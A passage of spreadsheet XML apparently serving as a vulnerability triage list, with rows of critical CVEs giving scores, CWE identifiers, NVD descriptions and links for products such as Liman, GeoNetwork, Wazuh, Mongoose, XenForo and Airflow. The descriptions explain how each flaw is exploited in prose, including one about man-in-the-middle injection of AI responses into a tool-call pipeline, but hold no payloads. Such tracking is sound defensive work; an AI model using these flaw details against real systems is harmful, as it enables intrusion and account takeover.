          <t>Liman is open source server management software. Prior to 2.2.2 - 1103, an OS command injection vulnerability in the log rotation configuration endpoint allows an authenticated administrator to execute arbitrary operating system commands on the Liman server. The `ip_address` parameter is embedded directly into a shell command without sanitization, enabling shell escape via single-quote injection. This is fixed in 2.2.2 - 1103.</t>
        </is>
      </c>
      <c r="M654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57499</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58400</t>
        </is>
      </c>
      <c r="C655" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D655" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G655" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the Saxon XSLT processor used to render formatters is configured without secure processing (`FEATURE_SECURE_PROCESSING`) and without disabling Java extension functions (`ALLOW_EXTERNAL_FUNCTIONS`). Any stylesheet loaded by GeoNetwork can therefore invoke
`java.lang.Runtime.exec()` or `java.lang.ProcessBuilder` directly, achieving arbitrary command execution as the GeoNetwork process user. A user with sufficient privileges to upload a formatter can deliver a `.xsl` file containing Java extension call that execute arbitrary OS commands with the privileges of the GeoNetwork process. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="M655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58400</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61800</t>
        </is>
      </c>
      <c r="C656" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D656" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.4.0 through 4.14.6, a party holding the cluster key can write, overwrite, or delete arbitrary files under /var/ossec on worker nodes, leading to remote code execution as root. During cluster file synchronization, the non-merged branch of update_master_files_in_worker() moves each staged file to a destination derived only from safe_join(), which confines the path to /var/ossec but never verifies that the file lands in the directory declared by its cluster_item_key. Because the destination check present on the primary node and on the worker's merged branch was not applied, a peer can place files at attacker-chosen locations under /var/ossec, including paths that are executed as root, and the delete branch has the same gap. This is an incomplete fix for CVE-2026-30893, which addressed traversal outside /var/ossec but left this path able to redirect files anywhere within it. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61800</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62646</t>
        </is>
      </c>
      <c r="C657" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D657" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A session identifier is generated using an algorithm with insufficient randomness, resulting in a token with low entropy that can be predicted or brute-forced within a feasible number of attempts. This could allow an unauthenticated remote attacker to derive valid session identifiers and bypass authentication.</t>
        </is>
      </c>
      <c r="M657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62862</t>
        </is>
      </c>
      <c r="C658" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D658" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-330</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions up to and including 3.17.1, the default passwordless email magic-link authentication is vulnerable to login-code brute forcing that leads to account takeover. The email provider overrides NextAuth's default cryptographically secure token with a 6-digit code generated using Math.random(), reducing the keyspace to 900,000 with a 10-minute expiry, and the code itself is the raw value placed in the magic link. The verification callback enforces no attempt limit, lockout, or CSRF protection, and an incorrect guess does not consume the real code because the adapter returns null on a not-found token, so a valid code survives unlimited guessing within its lifetime. The only rate limiter applies to the code-sending path and is keyed on the client-controlled X-Forwarded-For header, allowing an attacker to request many concurrent live codes for one victim and further raise the odds of a matching guess. As a result, an anonymous attacker who knows a victim's email address can brute-force the callback and obtain an authenticated session as that user with no victim interaction, gaining full access to the victim's bots, results, and connected integration credentials. Deployments configured for OAuth or SSO only, with no email provider, are not affected. This issue is fixed in version 3.18.0</t>
        </is>
      </c>
      <c r="M658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62862</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67593</t>
        </is>
      </c>
      <c r="C659" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D659" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G659" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr">
        <is>
          <t>A remote attacker can craft an Openwire RemoveSubscriptionInfo command to cause the deletion of a queue on the Artemis broker before the connection authentication and authorization stage or at any time thereafter. 
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67593</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67598</t>
        </is>
      </c>
      <c r="C660" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D660" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr">
        <is>
          <t>Emlog Pro through 2.6.23 contains a disabled TLS certificate validation vulnerability in include/service/ai.php that allows network-adjacent attackers to intercept outbound HTTPS requests to configured LLM providers by presenting arbitrary TLS certificates, as CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are unconditionally disabled across sendStream(), sendImageRequest(), send(), and fetchSearchHtml() with no option to re-enable verification. Attackers can perform man-in-the-middle interception to extract Authorization Bearer API keys from every AI request and inject crafted AI responses that may be acted upon by the tool-call execution pipeline, including the query_database and update_config tool handlers.</t>
        </is>
      </c>
      <c r="M660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67598</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="C661" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D661" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G661" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70452</t>
        </is>
      </c>
      <c r="C662" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D662" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>CWE-636, CWE-863</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>rsync 3.1.0 before 3.5.0 contains an access control bypass vulnerability that allows remote attackers to circumvent hosts deny rules by inducing DNS resolution failures during hostname-based access control evaluation. When a DNS lookup for a hostname-based deny rule fails, the daemon skips the rule rather than defaulting to a deny decision, enabling attackers who can trigger DNS failures to bypass module-level IP access controls and gain unauthorized access to restricted module file trees.</t>
        </is>
      </c>
      <c r="M662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70452</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73069</t>
        </is>
      </c>
      <c r="C663" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D663" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G663" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr">
        <is>
          <t>Twenty is an open-source CRM (customer relationship management) platform. Prior to 2.15.0, Twenty allowed a workspace administrator with the DATA_MODEL permission to supply settings.asExpression for the system TS_VECTOR field searchVector through PATCH /rest/metadata/fields/:id or the updateOneField GraphQL mutation, causing buildSqlColumnDefinition in packages/twenty-server/src/engine/twenty-orm/workspace-schema-manager/utils/build-sql-column-definition.util.ts to concatenate unescaped input into GENERATED ALWAYS AS (...) and execute arbitrary PostgreSQL statements as the application database user. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="M663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73069</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73253</t>
        </is>
      </c>
      <c r="C664" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D664" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L664" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to version 7.22, an on-path network attacker with a wildcard certificate for a parent domain can impersonate deeper subdomains to a client using the built-in TLS stack. The mg_tls_verify_cert_san() and mg_tls_verify_cert_cn() functions in src/tls_builtin.c call mg_match(), whose wildcard can cross DNS label boundaries, so a pattern such as *.example.com can match foo.bar.example.com. The resulting hostname verification bypass permits interception and modification of TLS traffic. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73253</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73256</t>
        </is>
      </c>
      <c r="C665" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D665" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote unauthenticated attacker can exploit an HTTP/1.0 reverse-proxy deployment by sending a request with Transfer-Encoding: chunked and conflicting framing. The http_cb() function in src/http.c tests hm.proto.len with an impossible greater-than-eight condition even though mg_http_parse() requires an eight-byte protocol string, so is_http_1_0 is never set. Mongoose consequently processes chunked encoding that an HTTP/1.0 proxy can ignore, enabling request smuggling and unauthorized access or state changes. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73256</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73257</t>
        </is>
      </c>
      <c r="C666" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D666" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Priro to version 7.22, a remote unauthenticated attacker can send an HTTP request containing both Content-Length and Transfer-Encoding: chunked. The cl_count and te_count checks in the mg_http_parse() and http_cb() paths in src/http.c accept both headers and prioritize chunked encoding, while a Content-Length-preferring reverse proxy can use a different request boundary. This CL.TE desynchronization can inject requests that access or modify resources in another user context. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73257</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="C667" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D667" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="L667" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="M667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="C668" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D668" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="M668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="C669" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D669" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L669" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="M669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73475</t>
        </is>
      </c>
      <c r="C670" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D670" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr">
        <is>
          <t>centarro:commerce_paypal</t>
        </is>
      </c>
      <c r="I670" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Commerce PayPal allows Forceful Browsing. This issue affects Commerce PayPal versions: from 0.0.0 to 1.12.0, from 2.0.0 to 2.1.3.</t>
        </is>
      </c>
      <c r="M670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73475</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="C671" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D671" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G671" s="5" t="inlineStr">
        <is>
          <t>microsoft, apache, azure</t>
        </is>
      </c>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="M671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75160</t>
        </is>
      </c>
      <c r="C672" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D672" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L672" s="5" t="inlineStr">
        <is>
          <t>An issue in X-Serie Gateway Firmware V6_00_05 allows a remote attacker to escalate privileges via the endpoints /cgi-bin/wwwugw.cgi and /cgi-bin/ugwdownload.cgi.</t>
        </is>
      </c>
      <c r="M672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75160</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75340</t>
        </is>
      </c>
      <c r="C673" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D673" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>The device metadata import interface /device/instance/{productId}/property-metadata/import of jetlinks community 2.11 is vulnerable to Server-side request forgery (SSRF).</t>
        </is>
      </c>
      <c r="M673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75340</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75431</t>
        </is>
      </c>
      <c r="C674" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D674" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr">
        <is>
          <t>PowerJob Server version 5.1.2 (and likely earlier) uses a predictable JWT signing key for HS256-based authentication. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75431</t>
        </is>
      </c>
    </row>
    <row r="675">
